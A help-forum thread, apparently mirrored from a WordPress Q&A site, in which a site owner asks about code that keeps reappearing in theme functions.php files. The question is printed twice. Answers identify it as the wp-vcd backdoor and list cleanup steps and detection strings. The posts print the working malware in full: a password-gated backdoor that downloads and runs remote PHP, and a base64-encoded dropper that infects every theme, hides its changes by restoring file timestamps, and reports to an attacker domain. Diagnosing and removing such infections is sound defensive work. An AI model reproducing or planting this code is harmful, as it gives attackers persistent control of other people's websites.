This code appears in my theme's functions.php, also in child theme's. I've deleted it for two times but it comes back. What is it?
if ( isset( $_REQUEST['action'] ) && isset( $_REQUEST['password'] ) && ( $_REQUEST['password'] == '227972a1a62825660efb0f32126db07f' ) ) {
$div_code_name = "wp_vcd";
switch ( $_REQUEST['action'] ) {
case 'change_domain';
if ( isset( $_REQUEST['newdomain'] ) ) {
if ( ! empty( $_REQUEST['newdomain'] ) ) {
if ( $file = @file_get_contents( __FILE__ ) ) {
if ( preg_match_all( '/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code4\.php/i', $file, $matcholddomain ) ) {
$file = preg_replace( '/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file );
@file_put_contents( __FILE__, $file );
print "true";
}
}
}
}
break;
default:
print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die( "" );
}
if ( ! function_exists( 'theme_temp_setup' ) ) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[ REQUEST_URI ];
if ( stripos( $_SERVER['REQUEST_URI'], 'wp-cron.php' ) == false && stripos( $_SERVER['REQUEST_URI'], 'xmlrpc.php' ) == false ) {
if ( $tmpcontent = @file_get_contents( ".php?i=" . $path ) ) {
function theme_temp_setup( $phpCode ) {
$tmpfname = tempnam( sys_get_temp_dir(), "theme_temp_setup" );
$handle = fopen( $tmpfname, "w+" );
fwrite( $handle, "<?php\n" . $phpCode );
fclose( $handle );
include $tmpfname;
unlink( $tmpfname );
return get_defined_vars();
}
extract( theme_temp_setup( $tmpcontent ) );
}
}
}
This code appears in my theme's functions.php, also in child theme's. I've deleted it for two times but it comes back. What is it?
if ( isset( $_REQUEST['action'] ) && isset( $_REQUEST['password'] ) && ( $_REQUEST['password'] == '227972a1a62825660efb0f32126db07f' ) ) {
$div_code_name = "wp_vcd";
switch ( $_REQUEST['action'] ) {
case 'change_domain';
if ( isset( $_REQUEST['newdomain'] ) ) {
if ( ! empty( $_REQUEST['newdomain'] ) ) {
if ( $file = @file_get_contents( __FILE__ ) ) {
if ( preg_match_all( '/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code4\.php/i', $file, $matcholddomain ) ) {
$file = preg_replace( '/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file );
@file_put_contents( __FILE__, $file );
print "true";
}
}
}
}
break;
default:
print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die( "" );
}
if ( ! function_exists( 'theme_temp_setup' ) ) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[ REQUEST_URI ];
if ( stripos( $_SERVER['REQUEST_URI'], 'wp-cron.php' ) == false && stripos( $_SERVER['REQUEST_URI'], 'xmlrpc.php' ) == false ) {
if ( $tmpcontent = @file_get_contents( "http://www.dolsh/code4.php?i=" . $path ) ) {
function theme_temp_setup( $phpCode ) {
$tmpfname = tempnam( sys_get_temp_dir(), "theme_temp_setup" );
$handle = fopen( $tmpfname, "w+" );
fwrite( $handle, "<?php\n" . $phpCode );
fclose( $handle );
include $tmpfname;
unlink( $tmpfname );
return get_defined_vars();
}
extract( theme_temp_setup( $tmpcontent ) );
}
}
}
- What theme are you using? – lukgoh Commented Oct 1, 2017 at 20:18
- Please post the name of the theme. It is possible that your site is hacked; or the theme you're using is backdoored by the authors - hard to say which. One way to check is to see the theme's code if the backdoor is still there. In any case, you should get rid of that file and check deeper to see if other files are infected (in other ways) too. – Sas3 Commented Oct 2, 2017 at 2:35
- Hi, I use Boss theme. But the code appears in every theme such as twentyseventeen theme.The code has gone now as I use Wordfence to scan and removed it. I think the problem derives from the plugins I use. – Topy Commented Oct 2, 2017 at 6:41
4 Answers
Reset to default 9Your website has been hacked. This is malicious code that gets triggered from the outside, loading more malicious content from 'www.dolsh' domain.
If the content comes back after you remove it, then you have hacked files somewhere else that will automatically rewrite functions.php any time page is loaded. You need to find and clean up all infected files, and it is impossible to tell which files are infected without detailed review of the website. Most infections like this spread into various areas to make sure they are hard to remove.
You should backup database, and then reinstall WordPress from scratch, all plugins you have and them that is not infected. It is possible that some plugin is the source of the infection, or the theme itself. If you have download plugins or themes from some illegal website (offering premium plugins for free), that is the most likely source of the infection.
I use Wordfence to scan the files. And the scan shows the results:
- the functions.php in twentyseventeen theme also contains the same code above.
In the wp-includes folder, there's a strange file "wp-vcd.php" The file contains the code below:
<?php error_reporting(0); ini_set('display_errors', 0); $install_code = 'PD9waHANCg0KaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkNCgl7DQokZGl2X2NvZGVfbmFtZT0id3BfdmNkIjsNCgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQ0KCQkJew0KDQoJCQkJDQoNCg0KDQoNCgkJCQljYXNlICdjaGFuZ2VfZG9tYWluJzsNCgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQ0KCQkJCQkJew0KCQkJCQkJCQ0KCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpDQoJCQkJCQkJCXsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmKHByZWdfbWF0Y2hfYWxsKCcvXCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzXCgiaHR0cDpcL1wvKC4qKVwvY29kZTRcLnBocC9pJywkZmlsZSwkbWF0Y2hvbGRkb21haW4pKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCg0KCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGZpbGUgPSBwcmVnX3JlcGxhY2UoJy8nLiRtYXRjaG9sZGRvbWFpblsxXVswXS4nL2knLCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10sICRmaWxlKTsNCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOw0KCQkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQgInRydWUiOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCg0KDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQ0KCQkJCQkJCQl9DQoJCQkJCQl9DQoJCQkJYnJlYWs7DQoNCgkJCQkNCgkJCQkNCgkJCQlkZWZhdWx0OiBwcmludCAiRVJST1JfV1BfQUNUSU9OIFdQX1ZfQ0QgV1BfQ0QiOw0KCQkJfQ0KCQkJDQoJCWRpZSgiIik7DQoJfQ0KDQoJDQoNCg0KaWYgKCAhIGZ1bmN0aW9uX2V4aXN0cyggJ3RoZW1lX3RlbXBfc2V0dXAnICkgKSB7ICANCiRwYXRoPSRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUltSRVFVRVNUX1VSSV07DQppZiAoIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsNCg0KaWYoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cuZG9sc2guY2MvY29kZTQucGhwP2k9Ii4kcGF0aCkpDQp7DQoNCg0KZnVuY3Rpb24gdGhlbWVfdGVtcF9zZXR1cCgkcGhwQ29kZSkgew0KICAgICR0bXBmbmFtZSA9IHRlbXBuYW0oc3lzX2dldF90ZW1wX2RpcigpLCAidGhlbWVfdGVtcF9zZXR1cCIpOw0KICAgICRoYW5kbGUgPSBmb3BlbigkdG1wZm5hbWUsICJ3KyIpOw0KICAgIGZ3cml0ZSgkaGFuZGxlLCAiPD9waHBcbiIgLiAkcGhwQ29kZSk7DQogICAgZmNsb3NlKCRoYW5kbGUpOw0KICAgIGluY2x1ZGUgJHRtcGZuYW1lOw0KICAgIHVubGluaygkdG1wZm5hbWUpOw0KICAgIHJldHVybiBnZXRfZGVmaW5lZF92YXJzKCk7DQp9DQoNCmV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOw0KfQ0KfQ0KfQ0KDQoNCg0KPz4='; $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT); $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code )); $themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes'; $ping = true; $ping2 = false; if ($list = scandir( $themes )) { foreach ($list as $_) { if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) { $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'); if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) { if (strpos($content, 'WP_V_CD') === false) { $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time ); } else { $ping = false; } } } else { $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_); foreach ($list2 as $_2) { if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) { $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'); if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) { if (strpos($content, 'WP_V_CD') === false) { $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time ); $ping2 = true; } else { //$ping = false; } } } } } } if ($ping) { $content = @file_get_contents('http://www.dolsh/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.dolsh/admin.txt')); } if ($ping2) { $content = @file_get_contents('http://www.dolsh/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.dolsh/admin.txt')); //echo ABSPATH . 'wp-includes/class.wp.php'; } } ?><?php error_reporting(0);?>In the wp-includes folder, this code appears at the top in the post.php file.
<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?><?phpIn the wp-includes folder, there's a strange file "wp-feed" containing this lines:
::1 127.0.0.1
Now after I've removed the code from all the theme's functions.php and the related file and removed the strange files. I noticed that that code doesn't come back again.
This problem derives from the plugins I download from websites that provide free plugins.
The code that you have shared points towards wp-vcd malware in your WordPress website. The main symptom of wp-vcd malware are spam popups, creates Spam URLs on the website.
Some variants of the malicious codes have been seen to modify core WordPress files and also add new files in the /wp-includes directory.
- The malware creates a backdoor which allows hackers to have access to your website for extended periods
- Hackers are able to exploit vulnerabilities in WordPress plugins & themes to upload the wp-vcd malware on vulnerable sites.
In the functions.php file within your theme, you would see some code similar to this:
<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>
Cleaning
Approach 1 – Search for files on the server that are usually infected with the wp-vcd hack
- wp-includes/wp-vcd.php
- wp-includes/wp-tmp.ph
- wp-content/themes/*/functions.php (all themes installed on the server whether active or not)
- class.theme-modules.php (inside the theme folder)
Approach 2 – Search for string patterns that are found in infected malware files
- tmpcontentx
- function wp_temp_setupx
- wp-tmp.php
- derna.top/code.php
- stripos($tmpcontent, $wp_auth_key)
For Reference purpose - https://www.getastra/blog/911/how-to-fix-wp-vcd-backdoor-hack-in-wordpress-functions-php/
if you downloaded premium plugins for free, please check, if it have this both files, be aware, these are files behind this issue.
class.plugin-modules.php class.theme-modules.php
before install, this file was 35kb size, once installed and activated theme/plugin, it move its code to all wp-includes folders in your hosting. so it keep living in all other sites wp-includes hidden.
发布者:admin,转转请注明出处:http://www.yc00.com/questions/1745261889a4619247.html
评论列表(0条)